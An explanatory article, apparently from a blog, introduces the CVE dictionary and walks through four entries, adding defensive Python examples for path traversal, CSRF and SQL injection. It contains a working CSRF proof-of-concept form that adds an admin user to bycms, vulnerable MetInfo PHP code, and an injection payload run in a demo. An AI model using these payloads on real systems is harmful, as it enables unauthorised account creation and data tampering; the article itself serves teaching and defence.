CVE, or Common Vulnerabilities and Exposures, is a public dictionary of registered vulnerabilities and threats in computer systems. According to the vision of those who maintain the CVE documentation, the dictionary is intended to serve as an industry standard for communication between different teams. Although its creators themselves avoid the term, it is a database of sorts. According to their documentation, a vulnerability is defined as a weakness in a given system (resulting from bugs), while a threat is defined as a violation of security policy. The dictionary of CVEs can be found here.
What a CVE consists of
Each CVE has its own ID, which is constructed as follows:
CVE-<year of submission>-<serial number>, for example CVE-2021-38197
An example entry (depending on the information provided) may look like the image below.
As we can see, it includes the ID mentioned above, a short description, references, the vulnerable version, the attack vector, its complexity and much more.
CVE examples
We will take a look at a few of the most recently registered vulnerabilities in the dictionary.
CVE-2021-38197
After opening the CVE, we learn that the entry concerns the go-unarr library, used to unpack RAR, TAR, ZIP and 7z archives. A GitHub link is provided as a reference, from which we learn that version 0.1.1 of the library allows a path traversal attack, which in the example results in a file from the archive being written anywhere on the server.
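To show the defender's side of the go-unarr entry, here is an added Python example (it is not code from the page or from the go-unarr project) that validates archive member names before anything is written to disk and refuses the whole archive when an entry would land outside the destination directory. The archives and destination paths are constructed for the demonstration; the check is generic and covers both `..` segments and absolute entry names.

```python
import io
import os
import tempfile
import zipfile


def unsafe_members(archive, dest):
    """Return the names of archive members whose resolved path would land
    outside dest.  realpath collapses '..' segments and symlinked directories;
    commonpath (rather than a plain startswith) means /srv/uploads2 is not
    mistaken for a child of /srv/uploads."""
    dest_real = os.path.realpath(dest)
    bad = []
    for name in archive.namelist():
        # os.path.join discards dest_real entirely if name is absolute,
        # so absolute entry names are caught by the same comparison.
        target = os.path.realpath(os.path.join(dest_real, name))
        if os.path.commonpath([dest_real, target]) != dest_real:
            bad.append(name)
    return bad


def safe_extract(archive, dest):
    """Extract every member of archive into dest, refusing the whole archive
    if any entry would escape.  Returns the list of written member names."""
    bad = unsafe_members(archive, dest)
    if bad:
        raise ValueError(f"refusing to extract, path traversal in: {bad}")
    written = []
    for info in archive.infolist():
        if info.is_dir():
            continue
        target = os.path.join(os.path.realpath(dest), info.filename)
        os.makedirs(os.path.dirname(target), exist_ok=True)
        with archive.open(info) as src, open(target, "wb") as dst:
            dst.write(src.read())
        written.append(info.filename)
    return written


def build_archive(entries):
    """Constructed in-memory ZIP; entry names are stored exactly as given,
    which is how a hostile archive carries '../' or absolute names."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    buf.seek(0)
    return zipfile.ZipFile(buf)


def demo():
    """Run the check against a benign and a hostile constructed archive."""
    dest = tempfile.mkdtemp()
    benign = build_archive({"docs/readme.txt": b"hello"})
    hostile = build_archive({"docs/readme.txt": b"hello",
                             "../../outside.txt": b"pwned",
                             "/abs/path.txt": b"pwned"})
    result = {"hostile_flagged": unsafe_members(hostile, dest),
              "benign_flagged": unsafe_members(benign, dest)}
    try:
        safe_extract(hostile, dest)
        result["hostile_extracted"] = True
    except ValueError:
        result["hostile_extracted"] = False
    result["benign_written"] = safe_extract(benign, dest)
    with open(os.path.join(dest, "docs", "readme.txt"), "rb") as f:
        result["readme"] = f.read()
    return result


if __name__ == "__main__":
    print(demo())
```

The check is done on the whole member list before the first write, so a hostile archive leaves no partial output behind. Symlink entries, which the ZIP and TAR formats can also carry, are a separate concern and are not handled here.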
CVE-2020-18457
As another example we will use the entry concerning the bycms content management system. In version 1.3.0, a suitably crafted file containing a form (below) allows us to launch a CSRF attack. If you don't yet know what that attack consists of, we refer you to here.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/admin.php/ucenter/add.html" method="POST">
<input type="hidden" name="username" value="root" />
<input type="hidden" name="password" value="11a040841c73c8627c274ba30f8b2123" />
<input type="hidden" name="mobile" value="1233435346456" />
<input type="hidden" name="email" value="qweqwe@qq.com" />
<input type="hidden" name="cover_id" value="" />
<input type="hidden" name="file_path" value="" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="id" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
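As an added example that is not part of the original post or of bycms, the following Python sketch shows the two server-side checks that make a form like the one above fail: a per-session CSRF token compared in constant time, and an Origin/Referer check as an independent second layer. The handler, the session dictionary and the site origin are assumptions standing in for the real admin.php/ucenter/add.html endpoint; the forged form reuses the fields from the PoC.

```python
import hmac
import secrets

# Constructed stand-in for the admin "add user" request in the PoC above.
# A cross-site form can post these fields, but it cannot read or set a value
# that only the victim's own session and the legitimate page know.
FORGED_FORM = {
    "username": "root",
    "password": "11a040841c73c8627c274ba30f8b2123",
    "mobile": "1233435346456",
    "email": "qweqwe@qq.com",
    "status": "1",
}


def issue_csrf_token(session):
    """Create a fresh random token, store it in the server-side session and
    return it so the legitimate page can embed it in a hidden form field."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def csrf_valid(session, form):
    """True only if the form carries the token stored in this session.
    compare_digest avoids leaking the token through timing differences;
    both sides are encoded so non-ASCII input cannot raise TypeError."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected.encode(), supplied.encode())


def origin_allowed(headers, site_origin):
    """Browsers send Origin (or at least Referer) on cross-site POSTs, so a
    request launched from another site fails here even if token handling is
    ever broken.  A missing header is rejected rather than trusted."""
    origin = headers.get("Origin") or headers.get("Referer")
    if origin is None:
        return False
    return origin == site_origin or origin.startswith(site_origin + "/")


def handle_add_user(session, headers, form, users, site_origin="http://localhost"):
    """Hypothetical replacement for the admin.php/ucenter/add.html handler:
    returns an (HTTP status, message) pair and appends to users on success."""
    if not origin_allowed(headers, site_origin):
        return 403, "cross-site request rejected by Origin check"
    if not csrf_valid(session, form):
        return 403, "CSRF token missing or invalid"
    users.append({"username": form["username"], "email": form.get("email", "")})
    return 200, "user added"


if __name__ == "__main__":
    session, users = {}, []
    print(handle_add_user(session, {"Origin": "http://attacker.example"}, FORGED_FORM, users))
    token = issue_csrf_token(session)
    print(handle_add_user(session, {"Origin": "http://localhost"},
                          dict(FORGED_FORM, csrf_token=token), users))
```

The token has to be unpredictable and bound to the session; a fixed or guessable value gives no protection, and the `SameSite` cookie attribute is a further layer that belongs alongside these checks.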
CVE-2020-36458
This example shows the breadth of the CVE dictionary: not every entry describes a direct attack on the users of an application.
In the CVE we read that the T and E parameters of the ReaderResult type were treated as safe to use from several threads at once. As a result, it allowed for potential memory corruption if multiple threads used these parameters. To understand how this occurs, we need a basic understanding of the Rust language.
In the Rust documentation we read that generic parameters use traits to specify the functionality they implement (a trait bound). Below is an example of a function accepting a generic type T that implements the Display trait.
// Define a function `printer` that takes a generic type `T` which
// must implement trait `Display`.
use std::fmt::Display;
fn printer<T: Display>(t: T) {
    println!("{}", t);
}
fn main() {
    printer(42); // i32 implements Display, so the bound is satisfied
}
In the report in question, the trait attached to the T and E parameters was Send, which, as we mentioned, marks a type as safe to hand over to another thread.
CVE-2020-20981
The subject of this entry is the MetInfo CMS. In its version 7.0.0 it was possible to perform a blind SQL injection attack with the help of the jdn endpoints. Vulnerable code:
public function dodel(){
    global $_M;
    // the id array comes straight from the request; it has only been through addslashes
    $id = isset($_M['form']['id']) ? $_M['form']['id'] : '';
    if (!$id){
        $this->error($_M['word']['js10']);
    }
    // the ids are joined and placed unquoted inside the IN (...) clause
    $id = implode(',',$id);
    $del_resutl = DB::query("DELETE FROM {$_M['table']['admin_logs']} WHERE id IN ({$id}) ");
    if (!$del_resutl){
        $this->error($_M['word']['opfailed']);
    }
}
On the following line, the value is only filtered by addslashes, which ultimately changes nothing: the ids are later joined with implode() and placed unquoted inside IN (...), so escaping quote characters does not stop a malicious payload from being injected further down the line.
$id = isset($_M['form']['id']) ? $_M['form']['id'] : '';
Ultimately, the vulnerability results in access to sensitive data.
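The following added Python example (not MetInfo's code) reproduces the pattern of dodel() against an in-memory SQLite table to show why addslashes does not help in an unquoted IN (...) clause, and places the hardened version next to it: integer validation plus bound parameters. The table, its rows and the payload are constructed for the demonstration.

```python
import sqlite3


def setup_db():
    """Constructed admin_logs table standing in for the CMS's own."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin_logs (id INTEGER PRIMARY KEY, action TEXT)")
    conn.executemany("INSERT INTO admin_logs VALUES (?, ?)",
                     [(1, "login"), (2, "edit"), (3, "logout")])
    conn.commit()
    return conn


def addslashes(value):
    """Python equivalent of PHP's addslashes(): it escapes quote characters,
    backslashes and NUL, and touches nothing else.  Parentheses, spaces and
    SQL keywords pass through untouched."""
    return (value.replace("\\", "\\\\").replace("'", "\\'")
                 .replace('"', '\\"').replace("\0", "\\0"))


def vulnerable_delete(conn, ids):
    """Mirrors the PHP dodel(): addslashes on each id, implode(',') and an
    unquoted IN (...) clause.  Returns the SQL text that was actually run."""
    id_list = ",".join(addslashes(i) for i in ids)
    sql = f"DELETE FROM admin_logs WHERE id IN ({id_list})"
    conn.execute(sql)
    conn.commit()
    return sql


def safe_delete(conn, ids):
    """Hardened version: every id must parse as an integer, and the values
    travel as bound parameters so they can never become part of the SQL text.
    Returns the number of ids that were submitted."""
    clean = [int(i) for i in ids]          # ValueError on anything non-numeric
    if not clean:
        return 0
    placeholders = ",".join("?" * len(clean))
    conn.execute(f"DELETE FROM admin_logs WHERE id IN ({placeholders})", clean)
    conn.commit()
    return len(clean)


def remaining_ids(conn):
    """Rows still present, used to observe the effect of each delete."""
    return [row[0] for row in conn.execute("SELECT id FROM admin_logs ORDER BY id")]


if __name__ == "__main__":
    conn = setup_db()
    # A payload without a single quote character survives addslashes unchanged
    # and rewrites the WHERE clause; the hardened path rejects it outright.
    print(vulnerable_delete(conn, ["0) OR (1=1"]), remaining_ids(conn))
    conn = setup_db()
    try:
        safe_delete(conn, ["0) OR (1=1"])
    except ValueError as exc:
        print("rejected:", exc, remaining_ids(conn))
```

The integer cast is the cheap first line of defence for a numeric id list; the bound parameters are what actually keeps data out of the query text, and they remain necessary for any column that is not numeric.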
Sources
https://cve.mitre.org/
https://www.whitesourcesoftware.com/resources/blog/cve-vulnerability/
https://cve.circl.lu/cve/CVE-2021-38197
https://cve.circl.lu/cve/CVE-2020-18457
https://cve.circl.lu/cve/CVE-2020-36458
https://doc.rust-lang.org/rust-by-example/generics/bounds.html#bounds
https://cve.circl.lu/cve/CVE-2020-20981